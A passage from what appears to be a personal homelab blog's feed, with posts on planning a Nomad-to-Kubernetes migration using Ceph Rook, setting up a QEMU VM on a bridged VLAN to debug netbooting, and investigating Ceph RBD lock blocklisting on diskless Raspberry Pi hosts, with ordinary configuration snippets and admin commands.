even more config to make sure the volume request gets the existing volume.</p>
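<p>As a rough sketch of what that transfer could look like. The mount points are
purely hypothetical, the real ones depend on where the old and new volumes end up
mounted:</p>
<pre tabindex="0"><code>rsync -aHAX --info=progress2 /mnt/old-csi-volume/ /mnt/new-csi-volume/
</code></pre>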
<p>For the setup itself, I will need to create a number of StorageClasses. There
will be two for RBD volumes, the main volume type for my CSI volumes. One will
be SSD, one HDD, depending on which kind of performance is needed by a given
service. Then there will also
be a CephFS class, for those few cases where I need multiple writer capabilities.
The same goes for the S3 StorageClass. These two only get HDD variants, as I
don&rsquo;t expect high throughput requirements here anyway.</p>
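<p>To make the StorageClass part a bit more concrete, here is a sketch of what one
of the RBD classes might look like with Rook&rsquo;s CSI driver. The pool and secret
names are assumptions based on the Rook examples, not my final config:</p>
<pre tabindex="0"><code>apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: rbd-ssd
provisioner: rook-ceph.rbd.csi.ceph.com
parameters:
  clusterID: rook-ceph
  pool: rbd-ssd-pool
  imageFormat: &#34;2&#34;
  imageFeatures: layering
  csi.storage.k8s.io/fstype: ext4
  csi.storage.k8s.io/provisioner-secret-name: rook-csi-rbd-provisioner
  csi.storage.k8s.io/provisioner-secret-namespace: rook-ceph
  csi.storage.k8s.io/node-stage-secret-name: rook-csi-rbd-node
  csi.storage.k8s.io/node-stage-secret-namespace: rook-ceph
reclaimPolicy: Delete
</code></pre>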
<h2 id="s3-content">S3 content</h2>
<p>After the Ceph Rook cluster is set up, the first data to be migrated will be
all the S3 buckets which are not directly related to a specific service. These
are mostly my <code>restic</code> backups and some misc stuff, like the Terraform bucket.</p>
<h2 id="migrating-the-logging-setup">Migrating the Logging setup</h2>
<p>This is going to be the first actual migration. Because I don&rsquo;t care too much
about my previous logs, I will simply create a completely new setup and not
bother to transfer the S3 bucket with my logs.</p>
<p>The setup will be similar to my current Nomad setup. Loki will do log storage,
which will be accessed via Grafana. Then comes my FluentD instance, which
aggregates the logs and unifies them, e.g. making sure there is only one level
for &ldquo;info&rdquo;, instead of <code>INF</code>, <code>info</code> and <code>I</code>. That instance will push logs to
Loki. I will also redirect all my logs, meaning syslogs from hosts and service
logs from Fluentbit, to this k8s instance and then retire Loki/FluentD from my
Nomad setup.</p>
<p>As said, should be relatively simple because I don&rsquo;t care about preserving past
logs.</p>
<p>At this point, the k8s cluster will be running the logging setup for the entire
Homelab. So it will have become load-bearing.</p>
<h2 id="setting-up-metrics-gathering">Setting up metrics gathering</h2>
<p>This part is a bit more complicated because I won&rsquo;t be migrating my old metrics
stack with Prometheus and Grafana over 1:1. Instead, I will start using the
<a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>.
Here I do want to preserve old data, as I like looking at older metrics as well
as current ones.
This showed the first challenge during planning: In Nomad, volumes are created
separately from the main job. For Kubernetes, I will be using Helm as my &ldquo;job&rdquo;
management tool. My current idea for cases where I want to migrate data over
is to do the first deployment of the Helm chart with zero replicas for the pod,
thus just creating everything else including volumes.</p>
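<p>Sketching that idea out as a values snippet. The key below follows the common
<code>replicaCount</code> convention; charts like kube-prometheus-stack use their own,
differently named replica settings:</p>
<pre tabindex="0"><code># First deployment pass: creates PVCs, ConfigMaps, Services and so on,
# but does not start any pods yet.
replicaCount: 0
</code></pre>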
<p>Another interesting difference is going to be Grafana. From everything I understand
now, Grafana&rsquo;s Helm chart relies on <a href="https://grafana.com/docs/grafana/latest/administration/provisioning/">provisioning</a>
for things like data sources, dashboards and the like. And in principle, I like
the idea of having my dashboards in Git. But it remains to be seen how much
exporting them to Git after every change starts annoying me.</p>
<p>On the positive side: Lots more data and pretty graphs about Kubernetes to look
at. &#x1f604;</p>
<p>The idea here is similar to the logging section: I will retire my Nomad setup
and let the k8s Prometheus instance do all the scraping for the Homelab.</p>
<p>One open question is going to be about the CSI volume utilization data. At the
moment, I&rsquo;m running a cronjob on all workers which regularly reports the
results of a filtered <code>df -h</code> via the local <code>node-exporter</code>&rsquo;s <code>textfile</code> feature.</p>
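<p>For reference, the textfile mechanism itself is simple enough that such a
cronjob boils down to something like the following. The paths, metric names and
mount filter are made up for illustration, not my actual script:</p>
<pre tabindex="0"><code>#!/bin/bash
# Write volume usage for CSI mounts into the node-exporter textfile directory.
TEXTFILE_DIR=/var/lib/node_exporter/textfile
TMP=$TEXTFILE_DIR/csi_volume_usage.prom.tmp
df -B1 --output=target,size,used | grep /csi-volumes/ |
while read -r target size used; do
  printf &#39;csi_volume_size_bytes{mountpoint=&#34;%s&#34;} %s\n&#39; &#34;$target&#34; &#34;$size&#34;
  printf &#39;csi_volume_used_bytes{mountpoint=&#34;%s&#34;} %s\n&#39; &#34;$target&#34; &#34;$used&#34;
done &gt; &#34;$TMP&#34;
# Atomic rename so node-exporter never reads a half-written file.
mv &#34;$TMP&#34; $TEXTFILE_DIR/csi_volume_usage.prom
</code></pre>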
<h2 id="setting-up-a-docker-registry">Setting up a docker registry</h2>
<p>At the moment, I run two Docker registries. One for my own Docker images, and
one as a pull-through cache for DockerHub. I will be trying out Harbor to see
how I like it.</p>
<h2 id="backups">Backups</h2>
<p>My backup setup currently consists of some simple Python scripting driving
<code>restic</code>, which does incremental backups of all locally mounted volumes every
night to my Ceph S3. This doesn&rsquo;t get me more redundancy, as the S3 is stored
on the same disks as the (mostly) Ceph RBD volumes used with CSI. But it does
protect me from fat-fingered <code>rm -rf /</code> commands. I will go into more detail
about what I&rsquo;m doing exactly in a separate post when I find the time.</p>
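<p>As a generic sketch of what such a nightly <code>restic</code> run against an S3 repository
looks like. The repository URL and paths are placeholders, and the real thing is
wrapped in the Python scripting mentioned above:</p>
<pre tabindex="0"><code>export RESTIC_REPOSITORY=s3:https://ceph-s3.example.com/backup-node01
# RESTIC_PASSWORD and the S3 credentials are assumed to be set in the environment.
restic backup --tag nightly /var/lib/my-csi-volumes
</code></pre>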
<p>In addition, I&rsquo;ve got a second job which downloads all of the backup S3 buckets
onto an external HDD via <code>rclone</code>.</p>
<p>No off-site backup yet. &#x1f62c;</p>
<p>This part will likely require at least a limited rewrite of my Python scripting.
Because the backups run per node and back up whatever happens to
run there at the time the backup job runs, I will be able to continue running
the per-node backup job on both clusters in parallel, as they will be backing
up different services&rsquo; data to different backup S3 buckets.</p>
<h2 id="service-migration">Service migration</h2>
<p>With all of the previous sections, all of the infrastructure is now in place
and I can begin migrating the services.
Here is an overview:
<figure>
    <img loading="lazy" src="service_deps.png"
         alt="A dependency diagram of the services in my Homelab. It shows 27 different services, ranging from Audiobookshelf to zigbee2mqtt. The largest number of connections go into Traefik, my Ingress proxy, and into CephRBD, which provides storage for services. There are two clusters. On the one side is Prometheus, with dependencies onto a number of smaller services like Mosquitto for MQTT or UptimeKuma for monitoring and service availability. On the other side is a service clustered around Postgres and Redis. Here are the heavier services, like Mastodon, Wallabag, Keycloak, Jellyfin and so forth."/> <figcaption>
            <p>An overview of my services and their dependencies.</p>
        </figcaption>
</figure>
</p>
<p>The first service to be created will be Postgres. Here, I decided to go with
a proposal from <a href="https://transitory.social/@rachel">Rachel</a>, <a href="https://cloudnative-pg.io/">cloudnative-pg</a>.
I will then migrate each database when I migrate the service using it, via
exporting and importing it.</p>
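<p>A sketch of what that export/import could look like with the standard Postgres
tools. The hostnames and database names are made up for illustration:</p>
<pre tabindex="0"><code>pg_dump -h postgres.nomad.example.com -U myapp -Fc -d myapp_db -f myapp_db.dump
pg_restore -h postgres.k8s.example.com -U myapp -d myapp_db myapp_db.dump
</code></pre>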
<p>After that will come <code>Audiobookshelf</code>. This service will serve as a testbed for
service migration, and I will write up some documentation on service migration
and create a Helm chart template for the rest of the migrations.</p>
<p>After that I don&rsquo;t expect many surprises. Where available, I will use the official
Helm chart for a service. Otherwise, I will be writing my own. Each individual
migration will consist of deploying the Helm chart first with zero replicas,
to create e.g. S3 buckets or CSI volumes. Then I will migrate databases, volume
and S3 data and then start up the k8s instance with Ingress via my Traefik.</p>
<p>Somewhere in the middle of all this, I will also have to update my host update
Ansible playbook, to properly fence off the Kubernetes hosts before rebooting
them.</p>
<p>The one service which I thought might be problematic is <code>Drone CI</code>. By default,
its runner runs CI pipelines in Docker. From what I&rsquo;ve read, I might be able to
set up Docker-in-Docker pods and run the pipelines there. But quite honestly, the Docker runner
requires mounting in the Docker socket, giving the runner root access, and I
had planned to migrate to <code>Woodpecker</code> anyway. So I will just do this as part
of the Kubernetes migration, as Drone CI&rsquo;s Kubernetes runner is still marked
experimental, while Woodpecker&rsquo;s isn&rsquo;t.</p>
<h2 id="cleanup">Cleanup</h2>
<p>The final step, after all workers are in Kubernetes, will be to migrate the
three Raspberry Pi 4 controller nodes over to serve the Kubernetes cluster. This
will be a bit complicated. I can shut down the Nomad cluster completely once the
last job is done, but the Consul cluster is different.</p>
<p>There are two things which rely on it: First, proper scraping of the Ceph cluster
MGR daemon for metrics. Here, Consul&rsquo;s healthcheck-backed DNS is currently
used to find the active MGR instance.
Second, access to my three Vault servers requires Consul for high availability.
Here, I&rsquo;m still not sure how I will solve this. I might possibly just migrate
the Vault cluster into Kubernetes as well.</p>
<p>Once the last few bits of data are cleared from the baremetal Ceph cluster,
I can finally migrate over the two baremetal servers to the Ceph Rook cluster.
To begin with, I will have them restricted to Ceph pods, but I will also test
what happens when I remove the &ldquo;Ceph&rdquo; taint I currently plan to put onto them.
But to make that decision, I will have to look more deeply into how Kubernetes
scheduling and especially preemption works.</p>
<p>The final act of the migration will be updating all docs (&#x1f91e;),
removing Nomad/Consul setups from my Ansible playbooks and finally shutting down
the VMs and retiring the x86 host again.</p>
<p>For this entire migration, to make sure I do not forget anything, I have
also created no less than 698 tasks in my favorite task management software,
<a href="https://taskwarrior.org/">Taskwarrior</a>.
I&rsquo;m accepting bets on how many tasks
in I will be before I have to nuke the plan and start fresh. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Interlude: Setting up a VM to work on netboots</title>
      <link>https://blog.mei-home.net/posts/testvm-for-netbooting/</link>
      <pubDate>Tue, 28 Nov 2023 22:43:30 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/testvm-for-netbooting/</guid>
      <description>How I set up a VM on my workstation to work on netboot scripts more comfortably</description>
      <content:encoded><![CDATA[<p>As I&rsquo;ve noted in <a href="https://blog.mei-home.net/posts/netboot-prob-virtualbox/">a recent post</a>,
I&rsquo;ve had a problem with my diskless netbooting hosts sometimes needing several
boot attempts to come up again.</p>
<p>In this article, I will describe a short setup for virtual machines to debug
such a problem.
I&rsquo;ve chosen to do it via virtual machines instead of one of my physical hosts
because it makes a lot of things easier. Chief amongst those is the fact that
with a VM, I&rsquo;m able to look at the boot process a lot more easily than with my
physical hosts, which are all headless in my setup. It also allows for faster
iteration, because most of my physical Homelab hosts are Raspberry Pis and hence
a bit on the slower side.</p>
<p>In this post, I will also be advising against the use of <em>VirtualBox</em>, as it
produced a lot of problems which did not appear with a QEMU VM.</p>
<h2 id="network-setup">Network setup</h2>
<p>Before I could start setting up the VM, I needed to do some network changes. My
desktop, where the VM was supposed to run, was in a different VLAN, and hence in
a different broadcast domain than my <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#dnsmasq-and-tftp">DNSmasq proxy DHCP server</a>,
which handles netbooting in my Homelab. As a consequence, I would not be able to
use that server without some changes.</p>
<figure>
    <img loading="lazy" src="network-diagram-netboot-vm.svg"
         alt="A network diagram. It shows two switches, the OPNsense logo, a stylized PC and a stylized server. Red arrows, labeled &#39;Homelab VLAN&#39; go from the server, to the first switch, from there to the second switch and from that switch to the OPNsense logo. Green arrows go from the PC to the second switch and from there to the OPNsense logo. Those green arrows are labeled &#39;Management VLAN&#39;."/> 
</figure>

<p>The above diagram shows an approximation of the relevant parts of my home network.
There is no access from the Homelab VLAN to my workstation, and my workstation
needs to go through the OPNsense router to reach the Homelab.</p>
<p>What I did not want to do was to add my workstation to the Homelab VLAN. That
would honestly just feel wrong.</p>
<p>At this point, the switch port my workstation hangs off of strips the VLAN
header from all packets coming in from the management VLAN, and tags all
packets coming from my workstation with the management VLAN ID.</p>
<p>To now run a VM on my Homelab VLAN from that machine, I added the switch port
to the VLAN, but did not configure stripping of the VLAN ID for outgoing packets.
This meant that the main NIC device on my workstation would never see the
packets coming from the Homelab VLAN, because those packets would not be
forwarded anywhere by the kernel if there are no devices configured for that
VLAN ID.
And because the machine sends out packets without VLAN tagging, the switch would
add a VLAN header with the management VLAN ID.</p>
<p>So the first thing to do was to create a Linux device which listens for packets
with the Homelab VLAN ID. I did it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ip link add link eth0 name eth0.100 type vlan id <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>ip link add name vlanbridge type bridge
</span></span><span style="display:flex;"><span>ip link set dev vlanbridge up
</span></span><span style="display:flex;"><span>ip link set eth0.100 master vlanbridge
</span></span><span style="display:flex;"><span>ip link set dev eth0.100 up
</span></span></code></pre></div><p>Let me try my hand at another illustration of this setup.</p>
<figure>
    <img loading="lazy" src="linux-vlan.svg"
         alt="A diagram of a Linux VLAN setup with a network bridge. There is a large box titled &#39;Workstation&#39;. At the border of this box sits a smaller box called &#39;eth0&#39;. Into this box go two arrows from outside the large &#39;workstation&#39; box. One red labeled &#39;Homelab VLAN&#39; and one green labeled &#39;Management VLAN&#39;. Inside the Workstation box, the green Management VLAN arrow leaves the &#39;eth0&#39; box and goes into another small box called &#39;userspace&#39;. The red arrow leaves &#39;eth0&#39; as well and goes into a box &#39;eth0.100&#39;. It leaves that box again and enters a network switch symbol, labeled &#39;bridge&#39;. The last red Homelab VLAN arrow leaves the network switch symbol again and points into a final box labeled &#39;VM&#39;."/> 
</figure>

<p>This setup provides a bridge inside the network stack the VM can use like a real
switch. Only packets marked with the Homelab VLAN ID will ever reach the VM,
and all packets the VM sends will be sent out via the <code>eth0.100</code> interface,
meaning they will all get tagged with the VLAN 100 ID. If I&rsquo;m not mistaken, this
setup should still completely isolate my own OS while also allowing the VM to
be in VLAN 100, the Homelab VLAN.</p>
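<p>To double-check that the bridge and the VLAN sub-interface ended up wired
together as intended, the standard iproute2 tooling can be used. Again, these are
generic commands rather than a transcript from my machine:</p>
<pre tabindex="0"><code>bridge link show
ip -d link show eth0.100
</code></pre>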
<h2 id="setting-up-virtualbox">Setting up VirtualBox</h2>
<p>Up to this point, VirtualBox has always been my go-to VM tool for quick and
dirty work on my desktop. That has changed now.</p>
<p>When setting up the VM, I chose the network bridge option in VirtualBox&rsquo; config.
At the beginning, this seemed to be working. I had configured the VM to netboot,
and after the aforementioned network re-config, the machine was able to netboot
as intended.</p>
<p>But that was about all that worked. When logging into the VM for the first time
via SSH, I already felt a pretty strong lag. Which was ridiculous, considering
that it was running on a pretty potent CPU. I started an <code>apt-get upgrade</code> anyway.
It was slow. Incredibly slow. And then it seemed to hang. SSH logins via another
terminal also hung.</p>
<p>After a reboot and a look at the kernel logs, I saw messages like these:</p>
<pre tabindex="0"><code>rbd: rbd0: encountered watch error: -107
rbd: rbd0: failed to unwatch: -110
systemd[1]: systemd-journald.service: State &#39;stop-watchdog&#39; timed out. Killing.
INFO: task kworker/u20:5:8900 blocked for more than 241 seconds.
nfs: server ceph-nfs.mei-home.net not responding, still trying
nfs: server ceph-nfs.mei-home.net OK
</code></pre><p>Here, <code>rbd0</code> is my Ceph RBD network attached root volume. I had never before
seen anything like this on any of my netbooting machines. The NFS failures also
indicated some sort of network problem, because none of the other 15 hosts using
the same NFS mount had any similar problems.</p>
<p>I finally gave up in resignation and conceded that it was Wireshark o&rsquo;clock.
And there it was.</p>
<pre tabindex="0"><code>1203	29.585824182	10.86.5.132	10.86.5.61	TCP	82	[TCP Dup ACK 1184#1] 5201 → 34502 [ACK] Seq=1 Ack=38 Win=65152 Len=0 TSval=4133901370 TSecr=2383831004 SLE=14518 SRE=15966
1204	29.585880097	10.86.5.61	10.86.5.132	TCP	1518	[TCP Retransmission] 34502 → 5201 [ACK] Seq=38 Ack=1 Win=64256 Len=1448 TSval=2383831070 TSecr=4133901370
</code></pre><p>Lots and lots of re-transmissions from my VM to a number of different Ceph hosts,
and the VM seeing a lot of what it considered duplicate ACKs coming from the
Ceph hosts.</p>
<p>Next, I tried to verify the problem with <code>iperf</code>. In the direction from the VM
to several hosts in my Homelab, I was not able to get beyond 1.5 MBit/s. Way
below my local 1 GBit/s network speed.
Next, I tried the other direction, from several Homelab hosts to the VM. And
that direction worked without any issue at all.</p>
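<p>The test itself is the usual client/server pair. The exact iperf variant isn&rsquo;t
important here; below is a generic <code>iperf3</code> example with a placeholder address:</p>
<pre tabindex="0"><code># On the Homelab host:
iperf3 -s
# Inside the VM (and later, for comparison, on the workstation itself):
iperf3 -c &lt;homelab-host&gt;
</code></pre>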
<p>The final straw for VirtualBox came when I ran the same <code>iperf</code> tests from
the host OS, but via the same <code>eth0.100</code> device. And I got almost the full speed
in both directions.</p>
<p>Side note: I also got a relatively high number of retries shown by iperf here,
but they did not seem to impact the performance.</p>
<p>So with that I concluded that maybe VirtualBox was broken in some way for this
particular setup.</p>
<h2 id="qemu">QEMU</h2>
<p>I decided to try it a different way: Using QEMU instead of VirtualBox, just
to see whether that worked better. And it did.</p>
<p>For launching the QEMU VM, I adapted <a href="https://gist.github.com/gdamjan/3063636">this script</a>
I had already used when I worked on my initial netboot setup.</p>
<p>I adapted it a little bit, to also integrate the setup and teardown of the
necessary networking devices, so I had everything in a neat package. It looks
like this now:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e"># Source: https://gist.github.com/gdamjan/3063636</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>MEM<span style="color:#f92672">=</span><span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>LAN<span style="color:#f92672">=</span>eth0
</span></span><span style="display:flex;"><span>VLANID<span style="color:#f92672">=</span><span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>VLAN<span style="color:#f92672">=</span>eth0.$VLANID
</span></span><span style="display:flex;"><span>VMIF<span style="color:#f92672">=</span>vmif
</span></span><span style="display:flex;"><span>BRIDGE<span style="color:#f92672">=</span>br
</span></span><span style="display:flex;"><span>ARCH<span style="color:#f92672">=</span>x86_64 <span style="color:#75715e"># i386</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> start_vm <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  /usr/bin/qemu-system-$ARCH <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -enable-kvm <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -m $MEM <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -boot n <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -bios /usr/share/edk2-ovmf/OVMF_CODE.fd <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -smp <span style="color:#ae81ff">4</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -net nic,macaddr<span style="color:#f92672">=</span>00:11:22:33:44:55 <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -net tap,ifname<span style="color:#f92672">=</span>$VMIF,script<span style="color:#f92672">=</span>no,downscript<span style="color:#f92672">=</span>no
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> setup_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip tuntap add dev $VMIF mode tap
</span></span><span style="display:flex;"><span>  ip link add link $LAN name $VLAN type vlan id $VLANID
</span></span><span style="display:flex;"><span>  ip link add name $BRIDGE type bridge
</span></span><span style="display:flex;"><span>  ip link set $VLAN master $BRIDGE
</span></span><span style="display:flex;"><span>  ip link set $VMIF master $BRIDGE
</span></span><span style="display:flex;"><span>  ip link set $BRIDGE up
</span></span><span style="display:flex;"><span>  ip link set $VLAN up
</span></span><span style="display:flex;"><span>  ip link set $VMIF up
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> reset_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip link set $VMIF down
</span></span><span style="display:flex;"><span>  ip link set $VLAN down
</span></span><span style="display:flex;"><span>  ip link delete $VLAN
</span></span><span style="display:flex;"><span>  ip link delete $BRIDGE
</span></span><span style="display:flex;"><span>  ip tuntap del dev $VMIF mode tap
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>setup_net
</span></span><span style="display:flex;"><span>start_vm
</span></span><span style="display:flex;"><span>reset_net
</span></span></code></pre></div><p>The only addition compared to the setup for VirtualBox is the <code>tuntap</code> interface
for use by the VM, which is also added to the bridge interface.</p>
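<p>A quick way to sanity-check that wiring after <code>setup_net</code> has run is to list the interfaces enslaved to the bridge:</p>
<pre tabindex="0"><code># Show all interfaces that are currently members of the bridge
ip link show master br
# Expected members: eth0.100 (the VLAN interface) and vmif (the VM's tap device)
</code></pre>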
<p>I also gave the VM a hardcoded MAC address, so that I could use it to
configure netbooting for the machine.</p>
<p>This setup worked without any issue whatsoever and has served me well in further
work on my netboot setup.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I still don&rsquo;t know what was wrong with VirtualBox. I seem to remember that I
did not have these kinds of problems during earlier netboot testing.</p>
<p>Sadly, this setup did not really help me to figure out my original netboot
problem, because I was not able to reproduce the reboot problem even once on
the VM, just as I had failed to reproduce it on my test Pi.</p>
<p>But the setup was still worth it, as it served me well during the implementation
of better logging for the netboot process for my netbooting hosts, which I will
detail in the next post.</p>
<p>If any of you have any idea about what the VirtualBox problem might have been,
or you have a good SOP for investigating those retries iperf was showing me
between my workstation and my Homelab hosts, please don&rsquo;t hesitate to contact
me <a href="https://social.mei-home.net/@mmeier">on Mastodon</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Investigating my Netboot problems</title>
      <link>https://blog.mei-home.net/posts/netboot-prob-virtualbox/</link>
      <pubDate>Thu, 16 Nov 2023 22:01:16 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/netboot-prob-virtualbox/</guid>
      <description>Turning it off and on actually fixes the problem</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve had a problem for quite a while now. As a reminder, I&rsquo;m booting eight
Raspberry Pi CM4 and one <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo x86 II</a>
completely diskless, using boot partitions on NFS, PXE netboot and the Pi&rsquo;s
netboot feature with root disks being supplied by Ceph RBD volumes.
If you&rsquo;re interested in the details, I&rsquo;ve got an <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">entire series on the setup</a>,
as well as a separate article describing the <a href="https://blog.mei-home.net/posts/udoo/">Udoo boot setup</a>.</p>
<p>This worked very nicely for quite a while and did exactly what I wanted. But it
has one problem that&rsquo;s been eluding me for a long time now: The hosts don&rsquo;t
always come up again after a poweroff or a reboot.</p>
<p>My initial theory was that this was a problem with <a href="https://docs.ceph.com/en/latest/rbd/rbd-exclusive-locks/">Ceph&rsquo;s blocklisting</a>.
For Ceph RBDs, you can enable a feature called <em>exclusive locks</em>. This feature
means that there is only one large lock for an entire volume, which is by default
never given up. This improves performance slightly, because Ceph knows that no
other client will suddenly want to mount that particular volume.</p>
<p>To protect those volumes from concurrent access, that lock needs to be acquired.
But one of the standard problems with locking rears its head here as well:
What happens when the lock holder crashes? For these cases, Ceph allows locks
to be broken. This is a good mechanism to avoid blocking a volume perpetually.</p>
<p>But what happens when the original lock holder did not completely crash, but
instead just hung for a while and then continued processing as if nothing happened?
It wouldn&rsquo;t know that the lock has been broken, and with exclusive locks enabled,
it wouldn&rsquo;t check whether it still held the lock. And why would it? From its PoV,
nothing untoward happened.</p>
<p>So now you&rsquo;d have two clients thinking they hold the lock. Bad things might
happen. To prevent this, Ceph doesn&rsquo;t just break the lock. It also blocklists
the original lock holder for a while, so it can&rsquo;t make any writes to the RBD
volume.</p>
<p>This is a good approach I think. Unless you&rsquo;re running a diskless setup like mine.
As I noted, the hosts are completely diskless. They fetch an initramfs via
netboot, launch into it, and inside the initramfs I mount the RBD root volume.
I&rsquo;m genuinely proud of this setup. Realizing that an initramfs was just an
assortment of shell scripts was one of those great learning moments in my Homelab
experience.
But it has a downside, namely shutdowns. During shutdown, the root partition
cannot be unmounted completely. As a consequence, I also can&rsquo;t unmap the RBD
volume. Shutdowns/reboots still work, though. But during the reboot, the attempt
to map the RBD volume again will find that another client still holds the lock.
Ceph will then break that lock, but in the course of doing so, it will also
blocklist the previous client, which has the same IP as the new client.</p>
<p>So until recently, my working theory was: During boot, the host breaks the
Ceph lock, but at the same time, it puts itself onto Ceph&rsquo;s blocklist, and then
fails to map the RBD volume, consequently failing to boot.
To fix the problem, I found that it works to issue a <code>ceph blocklist clear</code>
command at the right time.</p>
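<p>For reference, the blocklist handling lives under the <code>ceph osd blocklist</code> subcommands in current Ceph releases (older releases call it <code>blacklist</code>); the address in the last line is just a placeholder:</p>
<pre tabindex="0"><code># List the current blocklist entries, including their expiry times
ceph osd blocklist ls
# Remove all entries at once
ceph osd blocklist clear
# Or remove a single entry by its address
ceph osd blocklist rm 10.86.5.132:0/123456789
</code></pre>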
<p>But I&rsquo;ve always had a sliver of doubt about that theory, because at any given
reboot, e.g. during general system updates, only some netboot hosts, always a
minority, would fail. Most of them would reboot without issue, but all of them
would create blocklisting entries for themselves.
And I would then sit there and try to get the failed hosts to boot cleanly
by switching them off and on again while basically issuing <code>ceph blocklist clear</code>
in an endless loop.</p>
<p>The nagging feeling in my head, for a while now, was that perhaps that was a bit
of cargo culting. I was clearing the blocklist, and then the hosts booted again.
But I always ignored the fact that sometimes, I had to go through the process
multiple times before the machine finally came up again. So perhaps it was just
the repeated reboots which fixed whatever issue I actually had?</p>
<p>It doesn&rsquo;t help that I don&rsquo;t have a good way to look at the console output of
my netbooting machines. Then there&rsquo;s also the fact that I could never reproduce
the problem with a fresh Pi not mounted in the rack but sitting on my desk with
a screen attached.</p>
<p>I finally reached the level of annoyance which made me put away my Kubernetes
project and get to the bottom of this issue. I set up a VM on my desktop to make
debugging easier than it is with a Pi. I will write up that story soon; just
take this from me for now: Keep your hands away from VirtualBox. &#x1f620;</p>
<p>With the VM setup, I got the same results as I got with a fresh Pi: Yes, the
machine blocklisted a client during reboot, but still didn&rsquo;t have a problem
mapping the RBD volume and booting up properly. Just that now, I could watch the
entire process. And there doesn&rsquo;t seem to be anything wrong. As expected, I get
the lock breaking, and then everything works as normal.</p>
<p>This has me pretty much convinced that something else is going wrong. So instead
of going with my original plan, which was just to add a <code>ceph blocklist clear</code>
to the initramfs root mount script, I will first introduce some better logging.</p>
<p>This means implementing <a href="https://www.kernel.org/doc/Documentation/networking/netconsole.txt">netconsole</a>
for all netbooting machines and then gathering those early boot logs in my
FluentD instance.</p>
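<p>As a rough sketch of what that will look like (addresses, ports and the MAC are placeholders), netconsole can be enabled either on the kernel command line or as a module parameter:</p>
<pre tabindex="0"><code># On the kernel command line, appended to the netboot cmdline:
#   netconsole=6665@10.86.5.50/eth0,6666@10.86.5.200/aa:bb:cc:dd:ee:ff
# Format: src-port@src-ip/device,target-port@target-ip/target-mac

# Or loaded at runtime as a module, e.g. for a quick test:
modprobe netconsole netconsole=6665@10.86.5.50/eth0,6666@10.86.5.200/aa:bb:cc:dd:ee:ff
</code></pre>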
<p>My biggest fear is that once I&rsquo;ve set that up, all my hosts will suddenly stop
having the problem and I will never ever get those logs I need. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>KubeExp: Day 1 operations</title>
      <link>https://blog.mei-home.net/posts/kubernetes-day-1/</link>
      <pubDate>Thu, 19 Oct 2023 15:49:58 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-day-1/</guid>
      <description>The first couple of steps with my new Kubernetes cluster</description>
      <content:encoded><![CDATA[<p>In the <a href="https://blog.mei-home.net/posts/kubernetes-cluster-setup/">last post</a> of
<a href="https://blog.mei-home.net/tags/kubeexp/">the series on my Kubernetes experiments</a>, I
described how to initialize the cluster. In this post, I will go into a bit more
detail on what I did once I finally had a cluster set up.</p>
<h1 id="tutorials">Tutorials</h1>
<p>Never having done anything with Kubernetes before, I started out with a couple
of tutorials.</p>
<p>The first one was <a href="https://kubernetes.io/docs/tutorials/configuration/configure-redis-using-configmap/">this one</a>.
It uses Redis as an example deployment to demonstrate how to use ConfigMaps.
This is an interesting topic for me, because one of the things I liked a lot
about Nomad was the tight integration with <a href="https://github.com/hashicorp/consul-template">consul-template</a>
for config files and environment variables via the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/template">template stanza</a>.
This stanza allows the user to template config files with inputs taken from other
tools. My main use case at the moment is taking secrets from Vault and injecting
them into configuration files.
Kubernetes does not have this capability out of the box, but I will get into
how I will do it further down in this post.</p>
<p>The one important piece of knowledge I gained from this tutorial was that when
a ConfigMap is used by the pod spec in a deployment manifest, the deployment&rsquo;s
